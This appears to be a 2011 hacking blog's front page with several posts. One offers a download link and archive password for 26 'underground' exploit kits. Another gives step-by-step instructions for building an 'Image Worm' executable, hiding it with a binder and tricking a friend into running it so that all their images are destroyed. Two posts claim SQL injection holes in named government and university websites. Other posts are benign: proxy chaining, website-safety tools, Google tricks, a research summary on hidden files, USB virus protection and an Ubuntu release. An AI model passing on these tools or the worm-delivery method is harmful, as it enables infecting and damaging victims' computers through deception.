Saturday, 14 May 2011

26 Underground Hacking Exploit Kits available for Download !





















List of Hacking Exploit Kits :

  • Unknow
  • Tor
  • Target-Exploit
  • Smart pack
  • RDS
  • My poly sploit
  • multisploit
  • mypack-009
  • mypack-091
  • mypack-086
  •  mypack-081
  • Mpack
  • Infector
  • Ice-pack-1
  • Ice-pack-2
  • Ice-pack-3
  • G-pack
  • Fire pack -1
  • Fire Pack -2
  • Fiesta -1
  • Fiesta -2
  • Cry 217
  • Armitage
  • Adpack -1
  • Adpack -2
  • 0x88


Download : http://www.multiupload.com/EFDCHHZ9ZD
Rar password : thn

Read more...

Tuesday, 10 May 2011

Factories Department Government Of Andhra Pradesh -Hackable

Factories Department Government Of Andhra Pradesh -website is vulnerable to sql injection.the security loop hole is find by me and  i inform to the admin to close the loop soon as possible

for proof i attach the screen shot of admin page

Read more...

Monday, 9 May 2011

Image Hack: How to hack Images on friend�s computer


Image hack has been the missing part of this blog. So, I am posting Image Worm software developed by Nathan which you can use to hack images on remote computer.

Image Worm: Hack Images on friend�s computer:

1. Download Image Worm software to hack images on friend�s computer.
Password: techotoys.net
2. Run the Image Worm software to see:
Hack image Worm
3. Now, select any image on your computer. This image will be used to replace all the images on victim computer i.e. all the images on your friend�s computer will be changed to your selected image.
4. After selecting the image, hit on �Build Worm� and Image worm will create a server.exe file in current directory.
Note: Do not run this server.exe file on your own computer. I don�t know how to nullify the changes done by this image hack. If you want to try out on your computer, make sure you use Deep Freeze 6 software before running server.exe file.
5. Now, bind the server.exe file with any other .exe file using FUD binder software. Send this binded file to your friend and ask him to run it on his computer. After running, our server.exe file will silently install itself on victim computer and all his images will be changed to your image selected in Step 3.
6.a. Images before Image hack:
Hack image worm 1
6.b Images after Image hack:
Hack image worm 2
Thus, now you can see this image hacking software changes all images on victim computer. You are able to hack images on your friend�s computer thanks to Image Worm software.
Note: The server.exe file may take some time to hack images on remote computer. Also, on some computers, Image Worm is able to hack images present in �Pictures� folder. So, the working of Image worm to hack images varies according to computer.

Read more...

Saturday, 7 May 2011

HOW TO CREATE PROXY CHAIN | PROXY CHAINING TUTORIAL


Proxy chaining 

A proxy is a server that acts as a gateway between your computer and your destination. Proxy servers are used to stay anonymous over the internet.
By using proxy server you can hide your real IP over the internet while surfing. 


User---------->[proxy]----------->[website]


the website will get the IP of the proxy not yours. 


Proxy Chaining: Proxy chaining is the use of more than 1 proxy servers to stay anonymous. You can use as many proxy servers as you can or want. The more you have, the more anonymous you will be. This can be shown like this..


User---------->[proxy1]---------->[proxy2]---------->[proxy3]---------->.......---------->[proxyN]---------->[website]


the user  first connect to Proxy1. After connecting to Proxy1, Now the user will connect to Proxy2, then, the user will connect to Proxy3, then the user will connect to Proxy4, and thus using N proxies, the user will then connect to website he want to use.


You can use as many proxies u want but you can never be 100% anonymous.


How to create proxy chaining


Download Proxy server Agent from the given link.
http://www.downloadtyphoon.com/proxy-server-agent/infobzqupjxk



  • Open 'Proxy Server Agent' and then click on 'Proxy Chains' and then click 'Add' to open the 'Add new proxy chain' window.
  • change the proxy chain name and port number. The port number must be unique.
  • Select the proxy chain type
  • Add proxies to the proxy chain by clicking the 'Add proxy' or 'Add random proxy' button.
  • The type of a proxy chain and last proxy in a chain should be the same.
  • then Click OK
Read more...

Thursday, 5 May 2011

4 Ways to Identify Safe Websites on the Internet


Safe Websites
On the whole Internet, there are approximately more than 150 million active websites up and running. As a result, it often becomes a real challenge for the users to identify safe websites that are trustworthy and reputed. Have you ever wondered to know the reputation of a website before placing the order? Need to know whether a given website is child safe? Well, here are some of the ways to identify safe websites on the Web.
 
1. WOT or Web Of Trust (www.mywot.com):
WOT is a great place to test the reputation of your favorite website. WOT gives real-time ratings for every website based on the feedback that it gets from millions of trustworthy users across the globe and trusted sources, such as phishing and malware blacklists. Each domain name is evaluated based on this data and ratings are applied to them accordingly. A snapshot of WOT ratings for www.svkmrit.blogspot.com is shown below:
 
 
 
 
 
 
As shown in the above snapshot, the reputation of each website is shown in terms of 4 components where green means excellent, yellow warns users to be cautious and red indicates potential danger.
 
Trustworthiness signifies the overall safety of the website. A poor rating may indicate that the site is associated with threats like Internet scams, phishing, identity theft risks and malware.
 
Vendor reliability tells you whether a given site is safe for carrying out buy and sell transactions with it. An excellent rating indicates superior customer satisfaction while a poor rating indicates possible scam or bad shopping experience.
 
Privacy indicates about �to what extent the site respects the privacy of it�s users and protects their personal identity and data�.
 
Child Safety indicates whether the content of a given site is appropriate for children. Site contents like sexual material, nudity and vulgarity will have a poor Child Safety rating.
 
In most cases, the WOT ratings are found to be highly accurate. To check the reputation of any given website, just visit www.mywot.com type-in the address of your favorite website and click on �Check now�. This tool alone can tell you a lot about the reputation and safety level of a website. However, in addition to this, I am giving you another 3 handy tools to identify safe websites on the Web.
 
2. McCafee SiteAdvisor:
McCafee SiteAdvisor is a free tool that is available as a browser add-on. It adds safety ratings to your browser and search engine results. You can download it fromwww.siteadvisor.com.
 
3. StopBadware:
Using this tool, you can check whether a given site is said to have involved in malware activity in the past. To check this, go tohttp://www.stopbadware.org/home/reportsearch and enter the URL or domain name of a website and click on �Search Clearinghouse �. If the search does not return any result, that means the site was never involved in any of the malware activity in the past.
 
4. Google Pagerank:
Google PageRank is another great tool to check the reputation and popularity of a website. The PageRank tool rates every webpage on a scale of 1 to 10 which indicates Google�s view of importance of the page. If a given website has a PageRank of less than 3, then it is said to be less popular among the other sites on the Internet.
 
However, PageRank will only tell you how much popular a given website is and has nothing to do with the safety level of a website. So, this tool alone cannot be used to evaluate a website�s safety and other factors.
 
PageRank feature is available as a part of Google Toolbar. You can install Google Toolbar from http://www.google.com/intl/en_uk/toolbar/ie/index.html.
 
I hope you like this article. Waiting for your comments�
Read more...

Tuesday, 3 May 2011

Google Search (I�m Feeling Lucky) Tricks


If you type �google gravity� and then click �I�m feeling lucky� on Google, the entire page will lose it�s gravity and you get to play with it.

If you type �elgooG� and then click �I�m feeling lucky� on Google, will take you to a Google website that is completely backwards.
This backwards version of the ultra-popular search engine will come up directly if you click the �I�m Feeling Lucky� button instead of �Google Search.� The site was originally created just for fun, but has actually become quite useful in China after Google was banned there.


If you type �Google pacman� and hit �im feeling lucky� then instead of �Doodle�(Google Logo), you will find Pacman Game created by Google. Click on �Insert Coin� (which is at place of Im feeling lucky button) button and you can play 1 player pacman. Double click to play 2 player version of same Game.
Google replaced doodle by Pacman Game on its 30th anniversary.

Type �Find chak norris� and hit �Im feeling Lucky�. You will get very interesting result.
Type �Google Easter Eggs� and hit �Im feeling Lucky�, You will find a special Google Game especially for you.
Type �Early Google� and hit �Im feeling lucky�, you will get Google History Milestones.
Type �Google Heart Page� and hit �Im feeling lucky�, and play with your heart.

Read more...

Monday, 2 May 2011

How to Hide Files on Hard Drives Without Encryption?


Researchers Devise Way to Hide Files on Hard Drives Without Encryption

Academic researchers have devised a new method to hide data files on hard drives from a third party "in plain sight."

A new application can hide sensitive data on a hard drive without encrypting it or leaving any obvious signs that the data is present, according to the academic researchers who developed it. This kind of a technique would allow organizations to safely conceal private information from unauthorized users.

The new software uses �steganography,� or the process of hiding data in plain sight, according to researchers from the University of Southern California and the National University of Science and Technology in Pakistan. The technique exploits the way the operating system normally splits up file data in numerous small chunks, called clusters, and writes them wherever there is free space on the hard drive.

Hassan Khan, Mobin Javed, Syed Ali Khayam and Fauzan Mirza collaborated on the paper �Designing a Cluster-Based Covert Channel to Evade Disk Investigation and Forensics.�Khan and his colleagues claim the process hides data so effectively that it would be �unreasonably complex� for a third-party to detect it.

The method employs a �covert channel� to encode sensitive information. Instead of the operating system writing small pieces of the file in random areas on the hard drive, the software chooses the positions according to a secret code. The person who wants to access the file just needs to know the key to figure out where the fragments were written and reassemble the clusters accordingly.

�We present a new, plausible deniability approach to store sensitive information on a cluster-based filesystem,� the researchers wrote in the paper.

The process doesn�t leave behind any information about what it did, so anyone looking at the hard disk drive cannot see the hidden information or even be able to tell it exists, the researchers claimed. The hard drive would look like any other moderately fragmented drive.

Currently, users interested in protecting data generally wind up using encryption software. However, existing cryptographic methods generally leave behind some indicators that that the file has been encrypted. Attackers know there is something hidden and can try to use other methods to obtain the secret key to access the data.

Other existing methods involve adding pixels in digital images or changing the transmission timing of network packets. These are all well-known techniques and easily detected, the researchers said.

�An investigator without the key cannot prove the presence of hidden information,� the authors wrote.

The researchers tested the process on a FAT32 file system, which is accessible by the Windows operating system, Mac OS X and all major Linux distributions. The researchers envisioned using the software to write data onto a portable USB drive. The program won�t work to hide data on a Windows 7 laptop, for example, because the operating system can�t be installed on FAT32.

If the drive is defragmented, the �hidden� file will no longer be accessible.

The covert channel approach may cause a small performance degradation on the system, but the developers claimed it isn�t enough to be an issue. They estimated that it would be feasible to hide about 20MB of data on a typical 160GB hard disk drive.
Read more...

How To Protect Your Computer From USB Viruses


Here are few useful tips that can help you to protect your computer from USB Viruses.

1) FreeCommander

When user double clicks on theUSB drive files pointed by the autorun.inf got executed which copies the virus files on your system.So , you should open your USB drive through FreeCommander , it�s file explorer like windows explorer.

Download FreeCommander

2) Windows Feature Autorun

Mostly USB viruses contains autorun.inf and .bat file or similar . Autorun is windows feature which automatically initiates inserted usb or cd/dvd . For example , below is simple autorun.inf file that will launch program called launch.bat , launch.bat can be virus
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
So, to protect your computer from usb threats I suggest you to disable autorun feature.

How To Disable Autorun Feature Manually

1) Go to Run > type gpedit.msc

2) Under User configuration expand Administrative templates and select Windows Components..

3) Go to Autoplay Polices

4) Double click on Turn off autoplay

5) Select the radio button Enable- > Click ok

3)Protect Your USB Drive From Virus With Dummy Files

To prevent virus attacks to your PC, you must make your USB storage device free from virus as well which are most of the time plug and played to your PC. Usually, most of the virus and worms copies to your USB drive easily. No matter what you do, you cannot stop this action form virus when you insert your USB drive to infected computer. But to prevent from un-authorized copying of viruses you can make your USB storage device completely full so that no more files can be added to it. But filling up the storage device will not be practical as you have to add some heavy contents there and you won�t like to put large contents which will often hectic job. But after following this tutorial you�ll feel easier to do that.

4) Scan USB devices with antivirus

It�s a good idea to scan usb devices with updated antivirus software�s . Check my previous article Best Free Antivirus Software . there you�ll find some good free antivirus.

5)USB Write Protector

These viruses tend to copy themselves to the flash drive whenever system detected new device plug in. I still remember there are some old USB drives that come with write protect feature. But unfortunately most of the new flash drive don�t come with such feature, maybe the manufacturers want to cut down the cost?
So, the only way to protect our USB flash drive is enable the write protect through our own PC. With USB Write Protector, you can turn on/off the write protect to a USB flash drive.

Download USB Write Protector
Read more...

Saturday, 30 April 2011

Ubuntu 11.04 Released !




For those of you watching Ubuntu's website recently, you may have noticed a new version of the popular and easy to use variant of Linux has been surfaced - Natty Narwal. It can be downloaded from the previously linked site free of charge. Among the various new features, the Unity interface is set as the default UI, and includes the launcher (an OS X like dock), the dash (a popup menu with user defined shortcuts), and workspaces (a virtual desktop manager). According to the Ubuntu website, the OS can boot in as little as 7 seconds (following POST). 

Driving all of this eye candy is Gnome 2.32.1 (according to Ubuntu Vibes). If your current equipment is not capable of Unity, the classic desktop experience will kick in as to keep you moving along with minimal lag. Those of you wanting to experiment with Gnome 3, it cannot be installed via the Ubuntu repositories, and there have been reports of system instabilities post installation, though there is a workaround. If you're ready to install, there are 3 options for download, one for a CD/USB stick type installation, another to create a second boot partition alongside windows, and another for a standard standalone installation. The downloads are a one size fits all affair -- no longer is the Ubuntu Netbook edition or Desktop edition; there's just a single download for all platforms.

Download : http://www.ubuntu.com/download
Read more...

Monday, 25 April 2011

ANNA UNIVERSITY OF TECH-COVI is vulnerability to SQL INJECTION

  I report to admin of university to close the loop hole very quick as possible
              for more  proof check the snap shot





Read more...